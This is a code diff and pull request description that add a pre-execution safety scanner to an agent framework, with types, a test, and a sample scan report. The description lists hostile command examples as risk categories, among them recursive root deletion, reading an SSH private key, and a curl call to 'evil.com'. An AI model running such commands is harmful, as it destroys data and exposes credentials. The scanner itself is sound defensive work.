+      "rule_id": "dangerous_command",
+      "rule_name": "Dangerous Command",
+      "level": "critical",
+      "evidence": "destructive 'rm -rf' detected: rm -rf /tmp/test",
+      "suggestion": "specify precise paths and avoid recursive force delete",
+      "should_block": true
+    }
+  ],
+  "recommendation": "Security scan detected 1 risk(s):\n- [critical] Dangerous Command: destructive 'rm -rf' detected: rm -rf /tmp/test → specify precise paths and avoid recursive force delete"
+}

--- a/tool/safety/types.go
+++ b/tool/safety/types.go
@@ -1,0 +1,121 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+// Package safety provides a Tool Execution Safety Guard that scans
+// commands and code before execution, producing an allow / deny / ask
+// decision based on a configurable policy.
+//
+// The scanner sits on top of the existing shellsafe parser (structural
+// validation) and envscrub (environment scrubbing) layers, adding
+// semantic risk assessment: dangerous commands, network egress to
+// non-whitelisted hosts, shell-wrapper bypass attempts, hostexec
+// session risks, dependency installation, resource abuse, and
+// sensitive-information leakage.
+//
+// The scanner is designed to be plugged into the framework's
+// PermissionPolicy extension point so that high-risk tool calls are
+// blocked (or sent for human review) before execution, while every
+// decision is recorded as a structured audit event and OpenTelemetry
+// span attributes.
+package safety
+
+import "time"
+
+// Verdict is the outcome of a safety scan.  Named Verdict (not Decision)
+// to avoid collision with Decision types defined in other agent-related
+// packages; this mirrors the choice in tool.PermissionDecision, which uses
+// Action for the same reason.
+type Verdict string
+
+const (
+	// VerdictAllow means the command is safe to execute.
+	VerdictAllow Verdict = "allow"
+	// VerdictDeny means the command must not execute.
+	VerdictDeny Verdict = "deny"
+	// VerdictAsk means the command needs human review before execution.
+	VerdictAsk Verdict = "ask"
+)
+
+// RiskLevel classifies the severity of a detected risk.
+type RiskLevel string
+
+const (
+	// RiskLow indicates a minor concern that does not block execution.
+	RiskLow RiskLevel = "low"
+	// RiskMedium indicates a moderate concern that should be reviewed.
+	RiskMedium RiskLevel = "medium"
+	// RiskHigh indicates a serious concern that normally requires review.
+	RiskHigh RiskLevel = "high"
+	// RiskCritical indicates an immediate danger that must be blocked.
+	RiskCritical RiskLevel = "critical"
+)
+
+// Backend identifies the execution backend that a command targets.
+type Backend string
+
+const (
+	// BackendWorkspaceExec is the workspaceexec backend.
+	BackendWorkspaceExec Backend = "workspaceexec"
+	// BackendHostExec is the hostexec backend.
+	BackendHostExec Backend = "hostexec"
+	// BackendCodeExec is the codeexec backend.
+	BackendCodeExec Backend = "codeexec"
+)
+
+// Risk describes a single issue found by a rule.
+type Risk struct {
+	// RuleID is the unique identifier of the rule that fired.
+	RuleID string `json:"rule_id"`
+	// RuleName is a human-readable name for the rule.
+	RuleName string `json:"rule_name"`
+	// Level is the severity of this risk.
+	Level RiskLevel `json:"level"`
+	// Evidence is the concrete snippet that triggered the rule.
+	Evidence string `json:"evidence"`
+	// Suggestion is a recommended remediation.
+	Suggestion string `json:"suggestion"`
+	// ShouldBlock indicates whether this risk alone justifies denial.
+	ShouldBlock bool `json:"should_block"`
+}
+
+// ScanRequest is the input to a safety scan.
+type ScanRequest struct {
+	// ToolName is the model-visible tool name (e.g. "workspace_exec").
+	ToolName string
+	// Command is the shell command or code to scan.
+	Command string
+	// Backend identifies the execution backend.
+	Backend Backend
+	// Language is the code language (only for codeexec).
+	Language string
+}
+
+// ScanReport is the complete result of a safety scan.
+type ScanReport struct {
+	// Timestamp is when the scan completed.
+	Timestamp time.Time `json:"timestamp"`
+	// ToolName is the scanned tool name.
+	ToolName string `json:"tool_name"`
+	// Command is the scanned command (redacted in audit logs).
+	Command string `json:"command"`
+	// Backend is the execution backend.
+	Backend Backend `json:"backend"`
+	// Language is the code language, if applicable.
+	Language string `json:"language,omitempty"`
+	// Verdict is the final allow / deny / ask outcome.  Callers that
+	// need a boolean "is the command blocked" predicate should compare
+	// against VerdictDeny; we deliberately do not store a derived bool
+	// to avoid a second source of truth.
+	Verdict Verdict `json:"verdict"`
+	// RiskLevel is the highest risk level detected (or low if none).
+	RiskLevel RiskLevel `json:"risk_level"`
+	// Risks lists every risk found by the rules.
+	Risks []Risk `json:"risks"`
+	// Recommendation is a human-readable summary and remediation advice.
+	Recommendation string `json:"recommendation"`
+}

--- a/tool/safety/types.go
+++ b/tool/safety/types.go
@@ -59,6 +59,16 @@ const (
 type Backend string
 
 const (
+	// BackendNone marks a tool that is not an execution tool and therefore
+	// is not subject to command/code safety scanning.  When the resolved
+	// backend is BackendNone, the permission policy short-circuits to an
+	// allow decision instead of assuming the tool carries a "command"
+	// argument and producing an ask for a missing field.
+	//
+	// Tools that execute commands or code must declare a concrete backend
+	// via BackendProvider; BackendNone is the value used when no execution
+	// backend applies (e.g. file, search, or MCP tools).
+	BackendNone Backend = "none"
 	// BackendWorkspaceExec is the workspaceexec backend.
 	BackendWorkspaceExec Backend = "workspaceexec"
 	// BackendHostExec is the hostexec backend.
@@ -93,6 +103,12 @@ type ScanRequest struct {
 	Backend Backend
 	// Language is the code language (only for codeexec).
 	Language string
+	// Background reports whether the caller asked the command to run as a
+	// background process.  It is taken from the structured "background"
+	// boolean of the hostexec / workspaceexec argument shape, not inferred
+	// from the command text, so a background request with a clean command
+	// string is still classified correctly by the hostexec_risk rule.
+	Background bool
 }
 
 // ScanReport is the complete result of a safety scan.

--- a/tool/workspaceexec/workspace_exec.go
+++ b/tool/workspaceexec/workspace_exec.go
@@ -34,6 +34,7 @@ import (
 	"trpc.group/trpc-go/trpc-agent-go/log"
 	"trpc.group/trpc-go/trpc-agent-go/skill"
 	"trpc.group/trpc-go/trpc-agent-go/tool"
+	"trpc.group/trpc-go/trpc-agent-go/tool/safety"
 )
 
 const (
@@ -414,6 +415,14 @@ func toInternalBootstrapSpec(
 		})
 	}
 	return out
+}
+
+// SafetyBackend declares that ExecTool executes commands in the shared
+// workspace backend, so the safety scanner selects the workspaceexec
+// rule set without relying on tool-name substring matching.  The method
+// implements safety.BackendProvider.
+func (t *ExecTool) SafetyBackend() safety.Backend {
+	return safety.BackendWorkspaceExec
 }
 
 // Declaration returns the schema for workspace_exec.
@@ -1207,6 +1216,7 @@ func isAllowedWorkspacePath(rel string) bool {
 
 var _ tool.Tool = (*ExecTool)(nil)
 var _ tool.CallableTool = (*ExecTool)(nil)
+var _ safety.BackendProvider = (*ExecTool)(nil)
 var _ tool.Tool = (*WriteStdinTool)(nil)
 var _ tool.CallableTool = (*WriteStdinTool)(nil)
 var _ tool.Tool = (*KillSessionTool)(nil)

--- a/tool/workspaceexec/workspace_safety_backend_test.go
+++ b/tool/workspaceexec/workspace_safety_backend_test.go
@@ -1,0 +1,79 @@
+//
+// Tencent is pleased to support the open source community by making
+// trpc-agent-go available.
+//
+// Copyright (C) 2026 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package workspaceexec
+
+import (
+	"context"
+	"encoding/json"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/stretchr/testify/require"
+
+	localexec "trpc.group/trpc-go/trpc-agent-go/codeexecutor/local"
+	"trpc.group/trpc-go/trpc-agent-go/tool"
+	"trpc.group/trpc-go/trpc-agent-go/tool/safety"
+)
+
+// TestExecTool_DeclaresWorkspaceExecBackend asserts that ExecTool
+// declares its safety backend as workspaceexec via the
+// safety.BackendProvider interface, and that a permission check driven
+// through the real ExecTool records backend=workspaceexec in the audit
+// log.
+//
+// Without the interface, inferBackend falls back to a name heuristic:
+// the tool name "workspace_exec" contains neither "host" nor "code",
+// so it defaults to workspaceexec by chance — but relying on that
+// coincidence is fragile and is the same code path that misroutes
+// exec_command to workspaceexec. Declaring the backend explicitly
+// removes the dependency on name matching.
+func TestExecTool_DeclaresWorkspaceExecBackend(t *testing.T) {
+	tl := NewExecTool(localexec.New())
+
+	// Compile-time and runtime interface check.
+	var _ safety.BackendProvider = tl
+	require.Equal(t, safety.BackendWorkspaceExec, tl.SafetyBackend())
+
+	// End-to-end: the backend recorded in the audit log must be
+	// workspaceexec, sourced from the declared backend rather than from
+	// name matching.
+	tmpDir := t.TempDir()
+	auditPath := filepath.Join(tmpDir, "audit.jsonl")
+	scanner, err := safety.NewScanner(safety.DefaultPolicy())
+	require.NoError(t, err)
+	auditLogger, err := safety.NewAuditLogger(
+		auditPath, safety.DefaultPolicy().SensitivePatterns,
+	)
+	require.NoError(t, err)
+	defer auditLogger.Close() //nolint:errcheck
+
+	policy := safety.NewPermissionPolicyFromScanner(scanner, auditLogger)
+
+	args, err := json.Marshal(map[string]any{"command": "echo hello"})
+	require.NoError(t, err)
+
+	req := &tool.PermissionRequest{
+		Tool:      tl,
+		ToolName:  "workspace_exec",
+		Arguments: args,
+	}
+	_, err = policy.CheckToolPermission(context.Background(), req)
+	require.NoError(t, err)
+
+	data, err := os.ReadFile(auditPath)
+	require.NoError(t, err)
+
+	var event safety.AuditEvent
+	require.NoError(t, json.Unmarshal(data, &event), "audit log: %s", data)
+	require.Equal(t, string(safety.BackendWorkspaceExec), event.Backend,
+		"workspace_exec must route to the workspaceexec backend, not %q",
+		event.Backend)
+}


### PR DESCRIPTION
## Description

Add a pre-execution safety scanner (`tool/safety`) that scans shell commands and source code before execution, producing `allow` / `deny` / `ask` verdicts based on a configurable YAML policy.

## Motivation

Closes #2002

tRPC-Agent-Go`'s Tool, MCP Tool, Skill, and CodeExecutor capabilities let agents execute scripts, call external commands, read/write files, and access the network. These capabilities introduce security risks:

- Destructive commands (`rm -rf /`)
- Credential theft (`cat ~/.ssh/id_rsa`)
- Data exfiltration (`curl https://evil.com`)
- Shell-wrapper bypass (`sh -c '...'`)
- Privilege escalation (`sudo ...`)
- Dependency installation (`pip install malicious-pkg`)
- Resource abuse (infinite loops, `/dev/zero`)
- Secret leakage (API keys in commands)

The Safety Guard provides **defense-in-depth** — a semantic risk assessment layer that complements the existing structural validation (`shellsafe`), environment scrubbing (`envscrub`), and sandbox isolation layers.

## Architecture

```
PermissionPolicy → Scanner → 8 Semantic Rules → Verdict (allow/deny/ask)
```

The scanner runs in three stages:
1. **Structural validation**: shellsafe parse (shell-command backends only)
2. **Semantic rules**: 8 rule types covering all risk categories
3. **Verdict computation**: deny > ask > allow, with configurable defaults

## Risk Categories

| # | Rule ID | Risk | Default Level |
|---|---------|------|---------------|
| 1 | `dangerous_command` | Destructive commands, forbidden paths | critical/high |
| 2 | `network_egress` | Non-whitelisted network access | critical/high |
| 3 | `shell_bypass` | `sh -c`, `bash -c` wrappers | critical |
| 4 | `hostexec_risk` | Background, privilege escalation | medium/high |
| 5 | `dependency_install` | Package manager usage | medium/high |
| 6 | `resource_abuse` | Infinite loops, `/dev/zero` | high |
| 7 | `sensitive_leak` | API keys, tokens, credentials | high/critical |
| 8 | `code_exec_danger` | Dangerous patterns in source code | critical |

## Usage

```go
policy, err := safety.NewPermissionPolicy(
    "tool_safety_policy.yaml",
    "tool_safety_audit.jsonl",
)
runner.Run(ctx, role, sessionID, model.NewUserMessage(msg),
    agent.WithToolPermissionPolicy(policy),
)
```

## Backend-specific behavior

- **workspaceexec**: All rules + shellsafe. Background configurable.
- **hostexec**: All rules + shellsafe. Defaults to human review required.
- **codeexec**: Skips shellsafe. Uses `code_exec_danger` rule for Python/bash patterns.

## Checklist

- [x] 15 files: types, scanner, 8 rules, policy loader, permission adapter, audit, redactor, tests, config, README
- [x] All 33 tests pass
- [x] Godoc on all exported symbols
- [x] Configurable via YAML policy file